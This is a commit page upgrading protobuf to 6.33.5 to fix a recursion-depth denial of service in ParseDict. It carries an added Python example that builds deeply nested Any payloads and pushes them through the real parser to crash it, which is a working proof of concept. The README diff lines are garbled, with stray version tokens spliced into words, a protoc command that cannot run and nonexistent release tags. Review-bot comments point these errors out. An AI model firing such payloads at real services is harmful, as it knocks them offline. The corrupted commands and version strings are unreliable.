upgrade protobuf to 6.33.5 (fix security problem)

Cause: protobuf is affected by a JSON recursion depth bypass:

A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.

Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.
scito
2026-01-31 13:58:54 +01:00
committed by Roland Kurmann
parent a4fecc66ea
commit 74d95d2437
9 changed files with 436 additions and 416 deletions
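The bypass the commit message describes, as an added example written for this page (it is neither protobuf's code nor part of extract_otp_secrets): two depth-limited JSON walkers that model the shape of json_format's parser, one that forgets to count the levels it enters when it unwraps a google.protobuf.Any and one that counts them, plus a classifier that reports whether a nested-Any payload is rejected, accepted, or crashes the interpreter with RecursionError. The type URLs are the real ones from protobuf's JSON mapping; the walkers, the `classify` helper and the nested payload are constructed for the example, and `classify_installed_protobuf` only does anything when protobuf is installed. Its expectation that releases before 6.33.5 exhaust the stack while 6.33.5 rejects the payload is taken from the commit title, not verified here.

```python
"""Model of the nested-Any recursion-depth bypass in json_format.ParseDict.

Constructed for this page; not protobuf's own implementation and not part of
extract_otp_secrets. The two walkers imitate the relevant structure of the
JSON parser: a depth counter checked on every message, and a special case
that unwraps google.protobuf.Any by descending into its "value" member.
"""
import sys

# Real type URLs from the protobuf JSON mapping for Any and StringValue.
ANY_TYPE_URL = "type.googleapis.com/google.protobuf.Any"
LEAF_TYPE_URL = "type.googleapis.com/google.protobuf.StringValue"

# A nesting comfortably above the interpreter's own recursion limit.
DEEP_NESTING = sys.getrecursionlimit() * 2


class ParseError(Exception):
    """Stands in for json_format.ParseError ("Message too deep")."""


def make_nested_any(nesting):
    """Build the attacker-controlled JSON (constructed input): `nesting` Any
    messages wrapped in each other with a StringValue at the bottom. In the
    JSON mapping, an Any that wraps a well-known type is serialised as
    {"@type": <type url>, "value": <inner JSON>}."""
    node = {"@type": LEAF_TYPE_URL, "value": "leaf"}
    for _ in range(nesting):
        node = {"@type": ANY_TYPE_URL, "value": node}
    return node


def walk_vulnerable(node, max_depth, depth=0):
    """Depth-limited walk with the flaw the commit message describes:
    unwrapping an Any re-enters the walker at the *same* depth, so the limit
    never sees the Any levels. Returns the deepest depth the counter reached."""
    if depth > max_depth:
        raise ParseError("Message too deep. Max recursion depth is %d" % max_depth)
    if isinstance(node, dict) and node.get("@type") == ANY_TYPE_URL:
        return walk_vulnerable(node["value"], max_depth, depth)  # BUG: no depth + 1
    if isinstance(node, (dict, list)):
        children = node.values() if isinstance(node, dict) else node
        return max((walk_vulnerable(c, max_depth, depth + 1) for c in children), default=depth)
    return depth


def walk_fixed(node, max_depth, depth=0):
    """Same walk, but every unwrapped Any is accounted for as one more level."""
    if depth > max_depth:
        raise ParseError("Message too deep. Max recursion depth is %d" % max_depth)
    if isinstance(node, dict) and node.get("@type") == ANY_TYPE_URL:
        return walk_fixed(node["value"], max_depth, depth + 1)  # FIX: count the level
    if isinstance(node, (dict, list)):
        children = node.values() if isinstance(node, dict) else node
        return max((walk_fixed(c, max_depth, depth + 1) for c in children), default=depth)
    return depth


def classify(walker, nesting, max_depth):
    """Outcome for one payload: 'rejected' (limit enforced), 'accepted'
    (limit bypassed), or 'stack-exhausted' (RecursionError, the DoS outcome)."""
    try:
        walker(make_nested_any(nesting), max_depth)
    except ParseError:
        return "rejected"
    except RecursionError:
        return "stack-exhausted"
    return "accepted"


def classify_installed_protobuf(nesting=5000, max_depth=100):
    """Same payload through the real google.protobuf.json_format.ParseDict and
    its max_recursion_depth parameter. Returns None when protobuf is not
    installed. Per the commit title, releases before 6.33.5 are expected to
    give 'stack-exhausted' and 6.33.5 'rejected' (assumption, not verified)."""
    try:
        # wrappers_pb2 is imported so StringValue resolves in the default pool.
        from google.protobuf import any_pb2, json_format, wrappers_pb2  # noqa: F401
    except ImportError:
        return None
    try:
        json_format.ParseDict(make_nested_any(nesting), any_pb2.Any(),
                              max_recursion_depth=max_depth)
    except json_format.ParseError:
        return "rejected"
    except RecursionError:
        return "stack-exhausted"
    return "accepted"


if __name__ == "__main__":
    for name, walker in (("vulnerable", walk_vulnerable), ("fixed", walk_fixed)):
        print(name, "nesting=100 limit=10:", classify(walker, 100, 10),
              "| nesting=%d limit=10:" % DEEP_NESTING, classify(walker, DEEP_NESTING, 10))
    print("installed protobuf:", classify_installed_protobuf())
```

Running the module prints the four model outcomes. The instructive pair is the vulnerable walker on 100 levels with a limit of 10 (accepted, because the counter only ever sees the leaf) and on twice the interpreter's recursion limit (stack exhausted), which is the crash a remote caller can trigger through an otherwise depth-limited parser. `classify_installed_protobuf()` pushes the same payload through the real `ParseDict` so a deployment can confirm it is on a version that rejects it.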


@@ -14,7 +14,7 @@
[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/badges/StandWithUkraine.svg)](https://stand-with-ukraine.pp.ua)
<!-- ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/protobuf)
[![GitHub Pipenv locked Python version](https://img.shields.io/github/pipenv/locked/python-version/scito/extract_otp_secrets)](https://github.com/scito/extract_otp_secrets/blob/master/Pipfile.lock)
![protobuf 33.4version](https://img.shields.io/badge/protobuf-6.33.433.1-informational)-->
![protobuf 33.5version](https://img.shields.io/badge/protobuf-6.33.533.1-informational)-->
<!-- [![Github all releases](https://img.shields.io/github/downloads/scito/extract_otp_secrets/total.svg)](https://GitHub.com/scito/extract_otp_secrets/releases/) -->
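Review bot: the replacement badge line is not a valid version string: the alt text reads `protobuf 33.5version` and the badge URL `protobuf-6.33.533.1-informational`, so a stray `33.5` token has been spliced into both. If the badge is meant to advertise the package version from the commit title, it should be `![protobuf version](https://img.shields.io/badge/protobuf-6.33.5-informational)`. Note also that both the old and the new badge line sit inside the `<!-- ... -->` comment opened two lines above (the closing `-->` is on the badge line itself), so the badge is not rendered and this edit has no visible effect; either move the badge out of the comment or drop the change.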
@@ -385,7 +385,7 @@ python extract_otp_secrets.py = < example_export.png</pre>
* Provides a debug mode (-d) for analyzing import problems
* Written in modern Python using type hints and following best practices
* All these features are backed by tests ran nightly
* All functionality in one Python script: src/extract_otp_secrets.py (except protobuf 33.4generated code in protobuf_generated_python)
* All functionality in one Python script: src/extract_otp_secrets.py (except protobuf 33.5generated code in protobuf_generated_python)
## KeePass
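Review bot: the replacement line still carries the stray `33.5` token (`protobuf 33.5generated code`), so the sentence is no more readable than before; the intended text is presumably `(except protobuf generated code in protobuf_generated_python)`, which needs no version at all since it names a directory rather than a release. While here, `tests ran nightly` two lines up should read `tests run nightly`.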
@@ -748,11 +748,11 @@ sudo dnf install python3-pip perl envsubst
The export QR code of "Google Authenticator" contains the URL `otpauth-migration://offline?data=…`.
The data parameter is a base64 encoded proto3 message (Google Protocol Buffers).
Command for regeneration of Python code from proto3 message definition file (only necessary in case of changes of the proto3 message definition or new protobuf 33.4versions):
Command for regeneration of Python code from proto3 message definition file (only necessary in case of changes of the proto3 message definition or new protobuf 33.5versions):
protoc 33.4--plugin=protoc-33.4gen-mypy=path/to/protoc-33.4gen-mypy --python_out=src/protobuf_generated_python --mypy_out=src/protobuf_generated_python src/google_auth.proto
protoc 33.5--plugin=protoc-33.5gen-mypy=path/to/protoc-33.5gen-mypy --python_out=src/protobuf_generated_python --mypy_out=src/protobuf_generated_python src/google_auth.proto
The generated protobuf 33.4Python code was generated by protoc 33.433.1 (https://github.com/protocolbuffers/protobuf/releases/tag/v33.433.1).
The generated protobuf 33.5Python code was generated by protoc 33.533.1 (https://github.com/protocolbuffers/protobuf/releases/tag/v33.533.1).
For Python type hint generation the [mypy-protobuf](https://github.com/nipunn1313/mypy-protobuf) package is used.
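Review bot: the regeneration command in the replacement line will not run as written: `protoc 33.5--plugin=protoc-33.5gen-mypy=path/to/protoc-33.5gen-mypy` has the `33.5` token spliced into the binary name, the flag and the plugin name, whereas the protoc plugin flag takes the form `--plugin=protoc-gen-mypy=path/to/protoc-gen-mypy`. The same token corrupts the version sentence and its link: `protoc 33.533.1` and `releases/tag/v33.533.1` do not name a protobuf release (tags are of the form `v33.5`). Since the commit title upgrades the Python package to 6.33.5 and the commit touches 9 files, this sentence should state the exact protoc release actually used to regenerate `src/protobuf_generated_python` (`v33.5` if it was regenerated with the compiler matching the package) and link to that tag.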